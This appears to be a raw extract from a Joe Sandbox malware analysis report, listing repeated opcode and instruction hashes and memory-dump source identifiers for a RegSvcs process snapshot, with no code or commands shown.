                                                                          • Instruction ID: 24f93773f9b9ba6f5bc3c05bb9b2ea099b88ec9d370447dca2428074ccebde5b
                                                                          • Opcode Fuzzy Hash: d133f1c88479ddd83a13c52f181f1790852bf9864b88ae976fe7f2983bcb0c15
                                                                          • Instruction Fuzzy Hash: 23415A715083079ED712DF698850A6BB7E9FF84B54F41092BFA84DB260E730DE058BA3
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                          • Instruction ID: 99c68139a05dbf13907a0cb0c92aabf9a03ac63d273de081710a84752bb37de7
                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                          • Instruction Fuzzy Hash: FE412A71A00211DBDF22DE6984607BEBBB1FBD0754F25806BE9559F350D6328D80CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 961cfbefccf7c995dee4fac8cd78e6e8e0860b260028bcea25dbf61381ceedf5
                                                                          • Instruction ID: aff571924ac6694aa8c4a42bc14b492eb10984679bc1a8c4157adf6c388ad037
                                                                          • Opcode Fuzzy Hash: 961cfbefccf7c995dee4fac8cd78e6e8e0860b260028bcea25dbf61381ceedf5
                                                                          • Instruction Fuzzy Hash: 15415771600605EFD721CF19C844B2ABBE4FF64315F248A6EE5598B361E7B0E9428B90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                          • Instruction ID: b8b6f3c0f7171617a93aad8cbbc3820b8be1eb4c5b3f9018f638b4b9a53d65b3
                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                          • Instruction Fuzzy Hash: AD415B75A04705EFEB25CF99C980AAABBF4FF18700B10496DE556DB295D330EA84CF90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88a5a90f318409ff1a632d1faac961a940848c922d341f4ab27e8ec3dd2ac8db
                                                                          • Instruction ID: 4cbc7c1620eceb05e81a67940e36a21d3a93c33900c0ce606b725a1ddbf6f3e8
                                                                          • Opcode Fuzzy Hash: 88a5a90f318409ff1a632d1faac961a940848c922d341f4ab27e8ec3dd2ac8db
                                                                          • Instruction Fuzzy Hash: 4A41CF71941705CFCB22EF29C804A59B7F5FF94312F1186AEC4169B2B1DBB09942CF51
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1bab0e0a6cbf9af0b6293b4a9568a1ac74b77402d3b91c664ae61f5d64f17e22
                                                                          • Instruction ID: 97bf54433871a82a932119164e4c1e84e6d58f72aaed3b467ee417b35d95fe31
                                                                          • Opcode Fuzzy Hash: 1bab0e0a6cbf9af0b6293b4a9568a1ac74b77402d3b91c664ae61f5d64f17e22
                                                                          • Instruction Fuzzy Hash: 33317AB2A40246DFEB52CF68C040799BBF1FB49724F2085AED519EF251D376A902CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: efed93f6479699b455cbbb19a4b844196c5f8ef4a705f094d78601ff62d58591
                                                                          • Instruction ID: 0c1e6475257faba73b594b5beae08776ba8f67b4cca26d488f63a6b791f69f2f
                                                                          • Opcode Fuzzy Hash: efed93f6479699b455cbbb19a4b844196c5f8ef4a705f094d78601ff62d58591
                                                                          • Instruction Fuzzy Hash: 2B418C725083029BD760DF29C844B9BBBE8FF88664F104A2EF598DB291D7709904CBD2
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a34f1b07ee02708bcb34c7f522a2bebf84de09e24e49b67adfc406b44f6c1e8
                                                                          • Instruction ID: 11401cf16164c3cfe355a75495cc2e07b3e0eaec67d3f9d3bc57dbbecd8ff733
                                                                          • Opcode Fuzzy Hash: 7a34f1b07ee02708bcb34c7f522a2bebf84de09e24e49b67adfc406b44f6c1e8
                                                                          • Instruction Fuzzy Hash: E641BD726046529BD320DF68C840A6AB7E9FFD8700F140A2DF9949B6D0E730ED05C7A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bcdbbbde333e4f1dc88b2f2306119501b70f7b74186b9fc63e82d73e96c6bf1e
                                                                          • Instruction ID: 4bf88c796cb3796eac29dc5a2cc7c14f33c0bc9b984dedbfeb6a5804ac262eca
                                                                          • Opcode Fuzzy Hash: bcdbbbde333e4f1dc88b2f2306119501b70f7b74186b9fc63e82d73e96c6bf1e
                                                                          • Instruction Fuzzy Hash: 5941CD306003028BD725CF29D888B2ABBE9AF90366F19446EE651DB3A1DB70D805CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                          • Instruction ID: 132aed2f9384f9bff81b9c3f31c1650a83e6bd715e469b37831457361165ea7f
                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                          • Instruction Fuzzy Hash: 3D31F531A04245ABDB218B69CC44B9BBFE9EF54350F04416BF855DB362C6749845CBA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f8dcb988de16dd72e440819ec4e21f5a77bc23e7f9196d7360cf37f9b27df34b
                                                                          • Instruction ID: 81aca152865dd4a7e171a473b54aac609d145d3dcbbfb85bef6e9f8e0c840844
                                                                          • Opcode Fuzzy Hash: f8dcb988de16dd72e440819ec4e21f5a77bc23e7f9196d7360cf37f9b27df34b
                                                                          • Instruction Fuzzy Hash: 5D316735740716ABE722AF998C51F6A7AB5FB59B50F010029F604BF3E1DAA5DD00C7A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 41fb0b891059fe340ca3620d96507c1338955fb1f6610a71d5553b492dfc7781
                                                                          • Instruction ID: 46ca74b4de3cadbd46695e53d26674d7ef1d8842fcf22dc5b6611c91f5c87f53
                                                                          • Opcode Fuzzy Hash: 41fb0b891059fe340ca3620d96507c1338955fb1f6610a71d5553b492dfc7781
                                                                          • Instruction Fuzzy Hash: 18318D326052418FCB31DF19D990E2AB7E6FB84360F0A446EE9959F361D730EC46DB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee2535bd8dc9ce4b18817df7f0c7f9a50a3847e26ac2c5d82157bb58e6f58e77
                                                                          • Instruction ID: f3226fc3c07e9ab9fd7a04e010aada5cece979b4958356ff53d62ea5792ba940
                                                                          • Opcode Fuzzy Hash: ee2535bd8dc9ce4b18817df7f0c7f9a50a3847e26ac2c5d82157bb58e6f58e77
                                                                          • Instruction Fuzzy Hash: 1F41A071204745DFD722CF28C484BDA7BE5BF59754F15842EE66ACB2A0C774E804CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: caf79275486d15abbb21971d85def7b80564645d99d2e3622422bd0af0905c96
                                                                          • Instruction ID: d5e76fa9281e819a23c7b3fdc36ad88390b59467b1d0ba092c7f95c3c3a71bfb
                                                                          • Opcode Fuzzy Hash: caf79275486d15abbb21971d85def7b80564645d99d2e3622422bd0af0905c96
                                                                          • Instruction Fuzzy Hash: 1E317E716052418FDB20DF29D980E2AB7E5FB84710F05496DE9659F391E730EC06CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab13415d0fc99582091eb62be7a8e38f7e7abea699837e92d61b802033b263fb
                                                                          • Instruction ID: 5ff0bbb0105f287891ab3b0aa07da62e834c001286a73d1749a01efca5ef8689
                                                                          • Opcode Fuzzy Hash: ab13415d0fc99582091eb62be7a8e38f7e7abea699837e92d61b802033b263fb
                                                                          • Instruction Fuzzy Hash: C431E4322016829BF3229B5DCD69B29FBD8FB50750F1D00A6AF458F6E1DB28D941C220
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 20601f0f93922e59b20de3e473749762253e903fc1780168eae754b5c92f789b
                                                                          • Instruction ID: 76f39620ecc760f67a73fe40554707ebb5af21a63afcfad0a93c584bae24f6cc
                                                                          • Opcode Fuzzy Hash: 20601f0f93922e59b20de3e473749762253e903fc1780168eae754b5c92f789b
                                                                          • Instruction Fuzzy Hash: 2331B276A40156ABDB15DF98C840BAEB7B5FF44740F894169E900AF284D770ED41CBA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dce05d64d47e76cf590bb9b8f58868f61825f9b58c1abb622a177fa297de3be4
                                                                          • Instruction ID: dbabd3f205c1f1857cf44442ab3204593bd0b215cb7b8edc4bf12275066638e0
                                                                          • Opcode Fuzzy Hash: dce05d64d47e76cf590bb9b8f58868f61825f9b58c1abb622a177fa297de3be4
                                                                          • Instruction Fuzzy Hash: D3313476A4112EABCF31EF55DC44BDEBBB5BB98350F1500A5A908A7250DB309E518F90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                          • Instruction ID: 595acf768c520669d72866f5780f71283c349b31a694cbafaf8a7f52ef80d381
                                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                          • Instruction Fuzzy Hash: C811E273640606AFE7239F44CD41F9ABBB8FB94764F10442AF6048F190D675ED84CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a8fc37fd77dc354dcbc74335730294d24a35365a91f4f43a617633a4b12b63bc
                                                                          • Instruction ID: 6e4898ebfb4d56ba7f04811d27a3bcaedb5b1fe057659efc32169e83a7a28ce0
                                                                          • Opcode Fuzzy Hash: a8fc37fd77dc354dcbc74335730294d24a35365a91f4f43a617633a4b12b63bc
                                                                          • Instruction Fuzzy Hash: 2E11B2357406129FDF11CF4DC884A17BBE9AF5A712B18406EEE08DF315D6B2D902C790
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                          • Instruction ID: cc84a51569c74af78b3cdc932acfa131618cbef13af52d849cd1fd4677af6ce2
                                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                          • Instruction Fuzzy Hash: AD217C726016C1DFE7339F89C540A6ABBE6FB94B10F15887EE94A8B614C730EC01CB40
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9db9ee43ad7250e642ee1a9364671dc3657567dca1abad202cf4915aa7f0d6b5
                                                                          • Instruction ID: 0577579720845138d64e2c4fce4619b416d13c7376285c8a7cd402854dc6130f
                                                                          • Opcode Fuzzy Hash: 9db9ee43ad7250e642ee1a9364671dc3657567dca1abad202cf4915aa7f0d6b5
                                                                          • Instruction Fuzzy Hash: 12214975A4020ADFCB14CF98C581AAAFBF5FB88319F24416ED105AB325CB71ED06CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e22142602fd0a63014a80a765425059ac499c19ab9eb92736b7515c7b619c3ca
                                                                          • Instruction ID: 3280c83fddc34908b9a58d7a2d528dfa06d05f9ef05a99d5ada8dbb9d497c02d
                                                                          • Opcode Fuzzy Hash: e22142602fd0a63014a80a765425059ac499c19ab9eb92736b7515c7b619c3ca
                                                                          • Instruction Fuzzy Hash: B8216075601A41EFE7318F69C841F66B7F8FF44250F44882DE5AACB651DBB0B850CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 889e75300c644937c827cfc774fab96415b5e217da39926f8e81c4d7607a1ffb
                                                                          • Instruction ID: 217f3dcb49358d6f777613ba621ea73134d7dc7cd2cf06f48767491cbc775af1
                                                                          • Opcode Fuzzy Hash: 889e75300c644937c827cfc774fab96415b5e217da39926f8e81c4d7607a1ffb
                                                                          • Instruction Fuzzy Hash: B811C432240915EFE722DB59E941F9A77E8FB95750F114029F205DF260D770DD05C7A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb83ba8c66944ea5bf9b13d8a1576951f055939d8728d8b757877ef92f673b63
                                                                          • Instruction ID: 3339a8ce72041499d160fdc550a64e0595122f33220769f89f4d519f3ce873bb
                                                                          • Opcode Fuzzy Hash: eb83ba8c66944ea5bf9b13d8a1576951f055939d8728d8b757877ef92f673b63
                                                                          • Instruction Fuzzy Hash: 4411E5323041159FCB1BDB6DCC81A6F7296FBD5374B354D29E9228F390EA309802C790
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 409669bb1c46aa99837be2cf5c32535f549c636b5ce43a4abd4dfb77f1c58b1b
                                                                          • Instruction ID: 5b3ac744942fbf336c361e44eb8cb17f26d66d7a400bdb10e75d5978f62df173
                                                                          • Opcode Fuzzy Hash: 409669bb1c46aa99837be2cf5c32535f549c636b5ce43a4abd4dfb77f1c58b1b
                                                                          • Instruction Fuzzy Hash: 1F11CE76A02205DFDB26CF59C580E5ABBF8BF94650B02407EDA159F318E6B0DD00CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction ID: 27ff0c874cf9aa084a5f1aa404d85ecf3988055613daf9c963f061641054937b
                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction Fuzzy Hash: 47110436A0091AAFDB19CB58C811B9DBBF5FFC4310F058269E8459B340E771ED01CB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                          • Instruction ID: 8f201ebc93e97540349b423a65de2e879e91b5a9fb238f86245fa5ccf976fad0
                                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                          • Instruction Fuzzy Hash: 592106B5A00B059FD3A0CF29D440B52BBF4FB48B20F10492EE98ACBB50E371E814CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction ID: 6cc43a95b3df8043b3ebeee37476a04c97c09f41e4761d402e5f590fe06f64a1
                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction Fuzzy Hash: 7411BF39602601EBE721DF49C846B5A7BE9FB51754F05842DEA089F160D730DC41CBD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 83f1adcb38d8879fb6da4734371211ec992de46dcbc65b8db55ead902af1a008
                                                                          • Instruction ID: d89c0dc8cfa575800e476f6f3972727c07d04bb731b07d79c10bae4c2a792059
                                                                          • Opcode Fuzzy Hash: 83f1adcb38d8879fb6da4734371211ec992de46dcbc65b8db55ead902af1a008
                                                                          • Instruction Fuzzy Hash: 6201D676685645ABF327A6AED848F2B6BDCFF90358F050469FA018F291D974DC00C2B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8aa5c28073a18dbcd51a9fcd5c8247f123577abeba5ff87c4071b81ae9eaa99d
                                                                          • Instruction ID: 2b28e136126060a4154e4d9ac8e887c19989eadd7271b75d910eae4629541952
                                                                          • Opcode Fuzzy Hash: 8aa5c28073a18dbcd51a9fcd5c8247f123577abeba5ff87c4071b81ae9eaa99d
                                                                          • Instruction Fuzzy Hash: B511E3752846419FD721CF59D888B577BE4EB95B65F18411BF904CB760C330E800CFA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 53f63b01cefad8a79818a02348de7e5e26bfa9a7ce54dad1692c31782c0db06f
                                                                          • Instruction ID: 147bc4fdeb9ade0eff2bc868e0a966c53f9b5d4e878406cbaa2d1b5db5dedf09
                                                                          • Opcode Fuzzy Hash: 53f63b01cefad8a79818a02348de7e5e26bfa9a7ce54dad1692c31782c0db06f
                                                                          • Instruction Fuzzy Hash: 21118276A00616ABEB22DF59C980B5EFBB8FF94751F510859DA01AF214D770AD01CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 73c95b518e0a550d23fed264f301dcf6c45147a986077281215cd34be5446989
                                                                          • Instruction ID: 39cd876668da5edd4c8e14fb9247569d095b5268de259a364779062c7af7d1fc
                                                                          • Opcode Fuzzy Hash: 73c95b518e0a550d23fed264f301dcf6c45147a986077281215cd34be5446989
                                                                          • Instruction Fuzzy Hash: F601D27161110A9FC726DB19D509F16BBF9FB95314F21856AE1048F2A0D7B09C86CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction ID: 77ec095a863974f417d7d452ec4614b78db108a2199de29ea1cc0c638bb6f2ff
                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction Fuzzy Hash: 2311CE722016C29BE7239B6D8A54B2D7BD4FB0174CF2908A6DA419F7D2F339C842C260
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction ID: f7c41fd2e1918ad63414ae659b60cecfaab73fe94c8df9d31aaad03df86960ae
                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction Fuzzy Hash: 6901223A202146AFEB21DF19C802F5A7AEDFF90B50F058429EA04AF260E779DD40C7D0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction ID: 788054605cfff3d7bc9ae511e6bde0459ebef653a58f3dc248270a6185d35516
                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
